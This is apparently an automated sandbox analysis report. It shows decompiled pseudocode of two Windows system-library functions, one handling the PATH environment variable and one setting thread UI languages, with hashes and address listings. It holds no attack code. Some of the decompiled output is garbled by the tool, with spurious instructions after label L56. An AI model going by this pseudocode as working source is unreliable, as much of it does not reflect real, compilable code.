Opcode Fuzzy Hash: 9eb7729f9dd061c229f3098708756eeac49c8e70a269f5f9c61cd5b57c72d61d
Instruction Fuzzy Hash: 44510471D2029A8EDF35EF68C840BBEBBF1AF10314F1142ADD95DAB286D7704941CB81

Uniqueness

Uniqueness Score: -1.00%

Function 011E2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E011E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed char _t245;
				signed int _t254;
				signed int _t256;
				intOrPtr _t258;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t279;
				intOrPtr _t285;
				signed int _t287;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				signed int* _t300;
				signed int _t301;
				signed int _t305;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;
				signed char _t343;
				void* _t344;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x12ad360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0x12ab2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t344 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t285 = 0x48;
				_t315 = 0 | _t344 == 0x00000000;
				_t326 = 0;
				_v37 = _t344 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t285 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L011D4620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t285;
							_t287 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t315 - 0x12a8478;
								 *_t333 = ((0 | _t315 == 0x012a8478) - 0x00000001 & 0xfffffffb) + 7;
								E011FF3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t341 = _t341 + 0xc;
								_t287 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t279 = E012439F2(_t328);
									_t315 = _v32;
									_t328 = _t279;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t289 = _t333 + _t287 * 4;
								_v56 = _t289;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t240 =  *(_v60 + _t299 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t289 =  *(_v60 + _t299 * 4);
										 *(_t289 + 0x18) = _t328;
										_t244 =  *(_v60 + _t299 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M011E2959))) {
												case 0:
													__ax =  *0x12a8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E011FF3E0(__edi,  *0x12a848c, __ax & 0x0000ffff);
														__eax =  *0x12a8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E011FF3E0(_t328, _v80, _v64);
													_t274 = _v64;
													goto L26;
												case 2:
													 *0x12a8480 & 0x0000ffff = E011FF3E0(__edi,  *0x12a8484,  *0x12a8480 & 0x0000ffff);
													__eax =  *0x12a8480 & 0x0000ffff;
													__eax = ( *0x12a8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E011FF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E011FF3E0(_t328, _v76, _v36);
														_t274 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t328 = _t328 + (_t274 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t276);
													 *((short*)(_t328 - 2)) = _t276;
													goto L28;
												case 6:
													__ebx =  *0x12a575c;
													__eflags = __ebx - 0x12a575c;
													if(__ebx != 0x12a575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E011FF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x12a575c;
														} while (__ebx != 0x12a575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x12a8478 & 0x0000ffff = E011FF3E0(__edi,  *0x12a847c,  *0x12a8478 & 0x0000ffff);
													__eax =  *0x12a8478 & 0x0000ffff;
													__eax = ( *0x12a8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E012439F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x12a6e58 & 0x0000ffff = E011FF3E0(__edi,  *0x12a6e5c,  *0x12a6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x12a6e58 & 0x0000ffff;
													__eax = ( *0x12a6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t289 = _t289 + 4;
													__eflags = _t289;
													_v56 = _t289;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t326 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M011E2935))) {
							case 0:
								__ax =  *0x12a8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E011E2E3E(0,  &_v64);
								_t285 = _t285 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x12a8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x12a8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E011CEEF0(0x12a79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E011CEB70(__ecx, 0x12a79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x12a7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L011D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E011CEB70(__ecx, 0x12a79a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t338;
										_pop(_t286);
										return E011FB640(_t219, _t286, _v8 ^ _t338, _t315, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t281 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t283 = E011E2E3E(_t281,  &_v36);
									_t295 = _v36;
									_v76 = _t283;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t285 = _t285 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0x12a5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x12a8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x12a8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x12a6e58 & 0x0000ffff;
								__eax = ( *0x12a6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t300 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					_push(ds);
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t341;
					_push(ds);
					_t245 = _t244 + _t341;
					asm("daa");
					_push(ds);
					 *_t333 =  *_t333 + _t338;
					_push(ds);
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t245;
					 *0x1f011e26 =  *0x1f011e26 + _t245;
					_t290 = ds;
					_t247 = _t341;
					_t343 = _t245 &  *_t300;
					 *_t333 =  *_t333 - _t290;
					 *0x201225b =  *0x201225b + _t333;
					 *_t333 =  *_t333 - _t290;
					 *((intOrPtr*)(_t247 - 0x9fee1d8)) =  *((intOrPtr*)(_t341 - 0x9fee1d8)) + _t341;
					asm("daa");
					_push(ds);
					 *_t333 =  *_t333 + _t290;
					 *_t333 =  *_t333 - _t290;
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t300;
					_push(ds);
					_a35 = _a35 + _t290;
					_t291 = ds;
					_push(ds);
					 *((intOrPtr*)(_t343 + _t291 * 2)) =  *((intOrPtr*)(_t343 + _t291 * 2)) + _t333;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x128ff00);
					E0120D08C(_t291, _t328, _t333);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t254 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t256 = 4;
						while(1) {
							_v40 = _t256;
							__eflags = _t256;
							if(_t256 == 0) {
								break;
							}
							_t305 = _t256 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x1191664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t271 = E011FE5C0(_a8,  *((intOrPtr*)(_t305 + 0x1191668)), _t292);
									_t343 = _t343 + 0xc;
									__eflags = _t271;
									if(__eflags == 0) {
										_t336 = E012351BE(_t292,  *((intOrPtr*)(_v48 + 0x119166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t256 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t256 = _t256 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t329;
									if( *_t301 == _t329) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t258 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t258 + 0x48)) == _t301) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t336 = E011E2AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t261 = E011C6600( *(_t317 + 0x1c));
												__eflags = _t261;
												if(_t261 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E011E2C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E011CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t268 = E011E2AE4( &_v36, _a8, _t292, _a16, _a20, _t336);
									_v32 = _t268;
									__eflags = _t268 - 0xc0000100;
									if(_t268 == 0xc0000100) {
										_v32 = E011E2C50(_v36, _a8, _t292, _a16, _a20, _t336, 1);
									}
									_v8 = _t329;
									E011E2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t254 = _t336;
					}
					L70:
					return E0120D0D1(_t254);
				}
				L108:
			}

0x011e2584
0x011e2586
0x011e2590
0x011e2596
0x011e2597
0x011e2598
0x011e2599
0x011e259e
0x011e25a4
0x011e25a9
0x011e25ac
0x011e25ae
0x011e25b1
0x011e25b2
0x011e25b5
0x011e25b8
0x011e25bb
0x011e25bc
0x011e25bf
0x011e25c2
0x011e25c5
0x011e25c6
0x011e25cb
0x011e25ce
0x011e25d8
0x011e25db
0x011e25dd
0x011e25de
0x011e25e1
0x011e25e3
0x011e25e9
0x011e26da
0x011e26da
0x011e26dd
0x011e26e2
0x01225b56
0x00000000
0x011e26e8
0x011e26f9
0x011e26fb
0x011e26fe
0x011e2700
0x01225b60
0x00000000
0x011e2706
0x011e2706
0x011e270a
0x011e270a
0x011e270d
0x011e2713
0x011e2716
0x011e2718
0x011e271c
0x011e271e
0x01225b6c
0x01225b6f
0x01225b7f
0x01225b89
0x01225b8e
0x01225b93
0x01225b96
0x01225b9c
0x01225ba0
0x01225ba3
0x01225bab
0x01225bb0
0x01225bb3
0x01225bb3
0x01225ba3
0x011e2724
0x011e2726
0x011e2729
0x011e272c
0x011e279d
0x011e279d
0x011e27a0
0x011e27a2
0x00000000
0x011e272e
0x011e272e
0x011e2731
0x011e2734
0x011e2734
0x011e2736
0x01225bc1
0x01225bc1
0x01225bc4
0x00000000
0x01225bca
0x01225bca
0x01225bcd
0x00000000
0x01225bd3
0x00000000
0x01225bd3
0x01225bcd
0x011e273c
0x011e273c
0x011e2742
0x011e2747
0x011e274a
0x011e274d
0x011e2750
0x00000000
0x011e2756
0x011e2756
0x00000000
0x011e2902
0x011e2908
0x011e290b
0x00000000
0x011e2911
0x011e291c
0x011e2921
0x00000000
0x011e2921
0x00000000
0x00000000
0x011e2880
0x011e2887
0x011e288c
0x00000000
0x00000000
0x011e2805
0x011e280a
0x011e2814
0x011e2816
0x00000000
0x00000000
0x011e281e
0x011e2821
0x011e2823
0x00000000
0x011e2829
0x011e2829
0x011e2831
0x011e283c
0x011e283e
0x00000000
0x011e283e
0x00000000
0x00000000
0x011e284e
0x011e2850
0x011e2851
0x011e2854
0x011e2857
0x011e285a
0x011e285c
0x011e285d
0x00000000
0x00000000
0x011e275d
0x011e2761
0x00000000
0x011e2767
0x011e276e
0x011e2773
0x011e2773
0x011e2776
0x011e2778
0x011e277e
0x011e277e
0x011e2781
0x011e2781
0x011e2783
0x011e2784
0x00000000
0x00000000
0x01225bd8
0x01225bde
0x01225be4
0x01225be6
0x01225be8
0x01225be9
0x01225bee
0x01225bf8
0x01225bff
0x01225c01
0x01225c04
0x01225c07
0x01225c0b
0x01225c0d
0x01225c0d
0x01225c15
0x01225c18
0x01225c1b
0x01225c1b
0x01225c1e
0x00000000
0x00000000
0x011e28c3
0x011e28c8
0x011e28d2
0x011e28d4
0x011e28d8
0x011e28db
0x01225c26
0x01225c28
0x01225c2d
0x01225c2d
0x00000000
0x00000000
0x01225c34
0x01225c36
0x01225c49
0x01225c4e
0x01225c54
0x01225c5b
0x01225c5d
0x01225c60
0x011e2788
0x011e2788
0x011e278b
0x011e278e
0x011e278e
0x011e278e
0x011e2791
0x00000000
0x00000000
0x011e2756
0x011e2750
0x00000000
0x011e2794
0x011e2794
0x011e2795
0x011e2798
0x011e2798
0x00000000
0x011e2734
0x011e272c
0x011e2700
0x011e25ef
0x011e25ef
0x011e25ef
0x011e25f2
0x011e25f8
0x00000000
0x00000000
0x011e25fe
0x00000000
0x011e28e6
0x011e28ec
0x011e28ef
0x011e28f5
0x011e28f8
0x011e28f8
0x00000000
0x011e28f8
0x00000000
0x00000000
0x011e2866
0x011e2866
0x011e2876
0x011e2879
0x00000000
0x00000000
0x011e27e0
0x011e27e7
0x011e27e9
0x011e27eb
0x01225afd
0x00000000
0x01225afd
0x00000000
0x00000000
0x011e2633
0x011e2638
0x011e263b
0x011e263c
0x011e263e
0x011e2640
0x011e2642
0x011e2647
0x011e2649
0x011e264e
0x011e2650
0x011e2653
0x011e2659
0x011e26a2
0x011e26a7
0x011e26ac
0x011e26b2
0x01225b11
0x01225b15
0x01225b17
0x00000000
0x011e26b8
0x011e26b8
0x011e26ba
0x011e27a6
0x011e27a6
0x011e27a9
0x011e27ab
0x011e27b9
0x011e27b9
0x011e27be
0x011e27c1
0x011e27c3
0x011e27c5
0x011e27c7
0x01225c74
0x01225c79
0x01225c79
0x011e27c7
0x00000000
0x011e26c0
0x011e26c0
0x011e26c3
0x011e26c6
0x011e26c6
0x011e26c9
0x011e26c9
0x00000000
0x011e26c9
0x011e26ba
0x011e265b
0x011e265b
0x011e265e
0x011e2667
0x011e266d
0x011e2677
0x011e267c
0x011e267f
0x011e2681
0x01225b49
0x01225b4e
0x011e27cd
0x011e27d0
0x011e27d1
0x011e27d2
0x011e27d4
0x011e27dd
0x011e2687
0x011e2687
0x011e268a
0x011e268b
0x011e268e
0x011e268f
0x011e2691
0x011e2696
0x011e2698
0x011e269d
0x011e269f
0x00000000
0x011e269f
0x011e2681
0x00000000
0x00000000
0x011e2846
0x00000000
0x00000000
0x011e2605
0x011e260a
0x011e260c
0x011e2611
0x011e2616
0x011e2619
0x011e2619
0x011e261e
0x00000000
0x011e2624
0x011e2627
0x011e2627
0x00000000
0x00000000
0x01225b1f
0x00000000
0x00000000
0x011e2894
0x011e289b
0x011e289d
0x011e28a1
0x01225b2b
0x01225b2e
0x01225b2e
0x011e28a7
0x011e28a9
0x01225b04
0x01225b09
0x01225b09
0x01225b09
0x00000000
0x00000000
0x01225b35
0x01225b3c
0x011e28fb
0x011e28fb
0x011e26cc
0x011e26cc
0x011e26d0
0x00000000
0x011e26d2
0x011e26d2
0x00000000
0x011e26d2
0x00000000
0x00000000
0x011e25fe
0x011e292d
0x011e292f
0x011e2930
0x011e2935
0x011e2937
0x011e2938
0x011e293b
0x011e293c
0x011e293e
0x011e293f
0x011e2940
0x011e2942
0x011e2944
0x011e2948
0x011e294e
0x011e2951
0x011e2951
0x011e2952
0x011e2954
0x011e295a
0x011e295c
0x011e2962
0x011e2963
0x011e2964
0x011e2966
0x011e2968
0x011e296b
0x011e296c
0x011e2972
0x011e2977
0x011e2978
0x011e297d
0x011e297e
0x011e297f
0x011e2980
0x011e2981
0x011e2982
0x011e2983
0x011e2984
0x011e2985
0x011e2986
0x011e2987
0x011e2988
0x011e2989
0x011e298a
0x011e298b
0x011e298c
0x011e298d
0x011e298e
0x011e298f
0x011e2990
0x011e2992
0x011e2997
0x011e29a3
0x011e29a6
0x011e29ab
0x011e29ad
0x011e29b0
0x011e29b2
0x01225c80
0x011e29b8
0x011e29b8
0x011e29bb
0x011e29c0
0x011e29c5
0x011e29c6
0x011e29c6
0x011e29c9
0x011e29cb
0x00000000
0x00000000
0x011e29cd
0x011e29d0
0x011e29d9
0x011e29db
0x011e29dd
0x011e2a7f
0x011e2a84
0x011e2a87
0x011e2a89
0x01225ca1
0x01225ca3
0x00000000
0x011e2a8f
0x011e2a8f
0x00000000
0x011e2a8f
0x00000000
0x011e29e3
0x011e29e3
0x011e29e3
0x00000000
0x011e29e3
0x011e29dd
0x00000000
0x011e29db
0x011e29e6
0x011e29e9
0x011e29eb
0x011e29ed
0x011e29f3
0x011e29f5
0x011e29f8
0x011e29fa
0x011e2a97
0x011e2a9a
0x011e2a9d
0x011e2add
0x00000000
0x011e2a9f
0x011e2aa2
0x011e2aa5
0x011e2aa8
0x011e2aab
0x01225cab
0x01225caf
0x01225cc5
0x01225cda
0x01225cdc
0x01225cdf
0x01225ce5
0x00000000
0x01225ceb
0x01225ced
0x01225cee
0x00000000
0x01225cee
0x01225cb1
0x01225cb4
0x01225cb9
0x01225cbb
0x00000000
0x01225cbd
0x01225cbd
0x00000000
0x01225cbd
0x01225cbb
0x011e2ab1
0x011e2ab1
0x011e2ac4
0x011e2ac6
0x011e2ac6
0x00000000
0x011e2ac6
0x011e2aab
0x00000000
0x011e2a00
0x011e2a09
0x011e2a0e
0x011e2a21
0x011e2a24
0x011e2a35
0x011e2a3a
0x011e2a3d
0x011e2a42
0x011e2a59
0x011e2a59
0x011e2a5c
0x011e2a5f
0x011e2a5f
0x011e29fa
0x011e29f3
0x011e2a64
0x011e2a64
0x011e2a6b
0x011e2a6b
0x011e2a6d
0x011e2a72
0x011e2a72
0x00000000

Strings

PATH, xrefs: 011E2642, 011E2691

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 5861ab6beb33c0b6b319957942540f356632861d16314f6b02ac622679884751
Instruction ID: d63bbfbf2532cb4d8a0abdced286ce05b515f13b4f17dfd06883c71e45358b27
Opcode Fuzzy Hash: 5861ab6beb33c0b6b319957942540f356632861d16314f6b02ac622679884751
Instruction Fuzzy Hash: A1C1C271D50A1ADBCB2CDF98D895BADBBF5FF58700F494029E901AB250E7749841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 011EFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E011EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E011CEEF0(0x12a7b60);
					_t134 =  *0x12a7b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x12a7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x12a7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E011C6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E011C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01258938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E011BB150();
													}
													_t116 = E01256D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E011C75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x12a8638; // 0x0
																	_t122 = L011C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
